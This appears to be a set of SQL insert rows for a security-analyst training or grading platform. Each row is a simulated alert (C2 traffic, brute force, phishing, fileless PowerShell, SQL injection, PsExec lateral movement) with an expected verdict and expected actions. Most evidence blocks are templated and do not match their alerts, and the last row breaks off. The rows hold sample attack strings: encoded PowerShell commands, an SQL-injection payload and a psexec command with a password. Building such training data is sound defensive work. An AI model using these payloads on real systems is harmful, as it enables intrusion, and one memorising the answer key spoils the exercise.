(672, 'Suspicious Network Connection Detected from Internal to External Host', 'high', 'CrowdStrike', 'A connection attempt was detected from an internal host to a known malicious IP address used for command and control.', 'Malware', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:15:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.42\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"workstation01\",\"command_line\":\"powershell.exe -encodedcommand SGVsbG8gd29ybGQ=\",\"domain\":\"malicious-site.com\"}', '2026-01-11 03:07:07', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for command and control activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.42\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"malicious-site.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Domain associated with malware distribution\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The connection to a known malicious IP indicates a true positive for malware communication.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(673, 'Multiple Failed Login Attempts Detected from Foreign IP', 'medium', 'Wazuh', 'A foreign IP address has attempted to login into the corporate VPN with multiple failed attempts, indicating a possible brute force attack.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:00:15Z\",\"event_type\":\"login_failure\",\"src_ip\":\"185.199.108.153\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"vpn-server\",\"failed_attempts\":25}', '2026-01-10 22:06:55', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported for multiple brute force attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the VPN server\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The volume and origin of failed login attempts suggest a brute force attack.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.322Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:00:15Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.199.108.153\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"vpn-server\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:31:22.322Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:00:15Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.199.108.153\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"vpn-server\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:30:22.322Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:00:15Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.199.108.153\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"vpn-server\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:29:22.322Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:00:15Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.199.108.153\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"vpn-server\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:28:22.322Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:00:15Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.199.108.153\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"vpn-server\\\",\\\"failed_attempts\\\":25}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(674, 'APT Command and Control Communication via Discord', 'critical', 'Splunk', 'Detected command and control traffic using Discord\'s infrastructure, commonly used by APT groups for stealthy communications.', 'Data Exfiltration', 'T1105', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T11:25:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.50.5\",\"dst_ip\":\"162.159.138.233\",\"username\":\"alice\",\"hostname\":\"laptop-23\",\"url\":\"https://discordapp.com/api/v9/channels/1234567890/messages\"}', '2026-01-11 12:40:32', '2026-02-16 18:02:17', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"162.159.138.233\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"IP associated with Discord C2 activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.50.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"https://discordapp.com/api/v9/channels/1234567890/messages\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Discord API endpoint used for stealthy data exfiltration\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The use of Discord for C2 traffic is indicative of advanced threat activity.\"}', 'Expert', 'NDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.324Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:25:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.50.5\\\",\\\"dst_ip\\\":\\\"162.159.138.233\\\",\\\"username\\\":\\\"alice\\\",\\\"hostname\\\":\\\"laptop-23\\\",\\\"url\\\":\\\"https://discordapp.com/api/v9/channels/1234567890/messages\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.324Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:25:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.50.5\\\",\\\"dst_ip\\\":\\\"162.159.138.233\\\",\\\"username\\\":\\\"alice\\\",\\\"hostname\\\":\\\"laptop-23\\\",\\\"url\\\":\\\"https://discordapp.com/api/v9/channels/1234567890/messages\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.324Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:25:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.50.5\\\",\\\"dst_ip\\\":\\\"162.159.138.233\\\",\\\"username\\\":\\\"alice\\\",\\\"hostname\\\":\\\"laptop-23\\\",\\\"url\\\":\\\"https://discordapp.com/api/v9/channels/1234567890/messages\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.324Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:25:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.50.5\\\",\\\"dst_ip\\\":\\\"162.159.138.233\\\",\\\"username\\\":\\\"alice\\\",\\\"hostname\\\":\\\"laptop-23\\\",\\\"url\\\":\\\"https://discordapp.com/api/v9/channels/1234567890/messages\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.324Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:25:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.50.5\\\",\\\"dst_ip\\\":\\\"162.159.138.233\\\",\\\"username\\\":\\\"alice\\\",\\\"hostname\\\":\\\"laptop-23\\\",\\\"url\\\":\\\"https://discordapp.com/api/v9/channels/1234567890/messages\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(675, 'Phishing Attempt via Spoofed Domain', 'high', 'Proofpoint', 'A phishing email was sent to an employee with a spoofed domain mimicking a legitimate service to steal credentials.', 'Phishing', 'T1566', 0, 'investigating', NULL, '{\"timestamp\":\"2026-01-11T08:45:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.100\",\"dst_ip\":\"192.168.1.20\",\"username\":\"bsmith\",\"hostname\":\"mail-server\",\"email_sender\":\"support@microsfot.com\",\"url\":\"http://fake-login.microsoft.com\"}', '2026-01-10 19:17:54', '2026-02-20 09:08:29', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"support@microsfot.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Email address known for phishing activities\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://fake-login.microsoft.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL used for harvesting credentials\"}}],\"expected_actions\":[\"block_hash\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email and URL are indicative of a phishing attempt to harvest credentials.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Attempt via Spoofed Domain\",\"date\":\"2026-02-01T20:32:22.325Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(676, 'Detected Fileless Malware Execution', 'critical', 'EDR', 'A fileless malware was executed in memory using PowerShell, evading traditional file-based detection mechanisms.', 'Malware', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T12:05:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.100.15\",\"dst_ip\":\"192.168.100.15\",\"username\":\"jsmith\",\"hostname\":\"desktop-12\",\"command_line\":\"powershell.exe -nop -w hidden -enc JABQAGkATwB1AG4ARABjAGUATQBzAGcA\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-10 11:56:38', '2026-02-16 18:04:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -nop -w hidden -enc JABQAGkATwB1AG4ARABjAGUATQBzAGcA\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command for fileless malware execution\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No associated file, possible fileless malware\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of encoded PowerShell for in-memory execution indicates advanced evasion tactics.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(677, 'Suspicious DNS Queries to DGA Domain', 'high', 'Firewall', 'Detected multiple DNS queries to a domain generated by a domain generation algorithm (DGA), often used for botnet communications.', 'Malware', 'T1568', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T07:50:00Z\",\"event_type\":\"dns_query\",\"src_ip\":\"192.168.10.25\",\"dst_ip\":\"198.51.100.50\",\"username\":\"tadmin\",\"hostname\":\"office-pc\",\"domain\":\"a1b2c3d4e5f6g7h8.com\"}', '2026-01-09 22:50:34', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"a1b2c3d4e5f6g7h8.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Domain associated with DGA botnet activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.10.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the querying host\"}}],\"expected_actions\":[\"block_ip\",\"block_domain\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of DGA domains in DNS queries suggests botnet communication.\"}', 'Expert', 'MAL', 9, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(678, 'Web Attack: SQL Injection Attempt Detected', 'high', 'IDS/IPS', 'An attacker attempted an SQL injection attack on the corporate web application, potentially exploiting vulnerabilities to exfiltrate data.', 'Web Attack', 'T1190', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T13:20:10Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.55\",\"dst_ip\":\"192.168.1.100\",\"username\":\"guest\",\"hostname\":\"web-server\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-01-09 20:58:06', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for multiple SQL injection attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"Internal IP address of web server\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The request body indicates a classic SQL injection attempt, warranting investigation.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.328Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:20:10Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.328Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:20:10Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.328Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:20:10Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.328Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:20:10Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.328Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:20:10Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(679, 'Unauthorized Access Attempt via PSExec', 'critical', 'EDR', 'Detected unauthorized use of PSExec for lateral movement within the network, indicating a potential compromise of administrative credentials.', 'Lateral Movement', 'T1569', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T14:10:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.20.15\",\"dst_ip\":\"192.168.20.20\",\"username\":\"administrator\",\"hostname\":\"server-01\",\"command_line\":\"psexec \\\\\\\\192.168.20.20 -u administrator -p secret cmd.exe\"}', '2026-01-10 04:57:21', '2026-02-16 18:05:11', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.20.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Source IP of unauthorized PSExec execution\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.20.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Destination IP targeted for lateral movement\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec \\\\\\\\192.168.20.20 -u administrator -p secret cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"PSExec command used for unauthorized access\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of PSExec with administrative credentials suggests lateral movement within the network.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(680, 'Innocuous User Activity Mistaken for Attack', 'low', 'SIEM', 'A legitimate user activity was flagged as suspicious due to unusual but authorized access patterns.', 'Credential Attack', 'T1078', 0, 'Closed', 210, '{\"timestamp\":\"2026-01-11T15:00:00Z\",\"event_type\":\"login_success\",\"src_ip\":\"192.168.30.5\",\"dst_ip\":\"192.168.30.10\",\"username\":\"jane.doe\",\"hostname\":\"desktop-01\",\"request_body\":\"\"}', '2026-01-09 22:30:49', '2026-02-26 22:00:13', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.30.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Legitimate internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jane.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"User Management System\",\"verdict\":\"clean\",\"details\":\"Authorized user with legitimate access\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The activity was flagged due to unusual login patterns but was found to be legitimate upon review.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.330Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T15:00:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.30.5\\\",\\\"dst_ip\\\":\\\"192.168.30.10\\\",\\\"username\\\":\\\"jane.doe\\\",\\\"hostname\\\":\\\"desktop-01\\\",\\\"request_body\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.330Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T15:00:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.30.5\\\",\\\"dst_ip\\\":\\\"192.168.30.10\\\",\\\"username\\\":\\\"jane.doe\\\",\\\"hostname\\\":\\\"desktop-01\\\",\\\"request_body\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.330Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T15:00:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.30.5\\\",\\\"dst_ip\\\":\\\"192.168.30.10\\\",\\\"username\\\":\\\"jane.doe\\\",\\\"hostname\\\":\\\"desktop-01\\\",\\\"request_body\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.330Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T15:00:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.30.5\\\",\\\"dst_ip\\\":\\\"192.168.30.10\\\",\\\"username\\\":\\\"jane.doe\\\",\\\"hostname\\\":\\\"desktop-01\\\",\\\"request_body\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.330Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 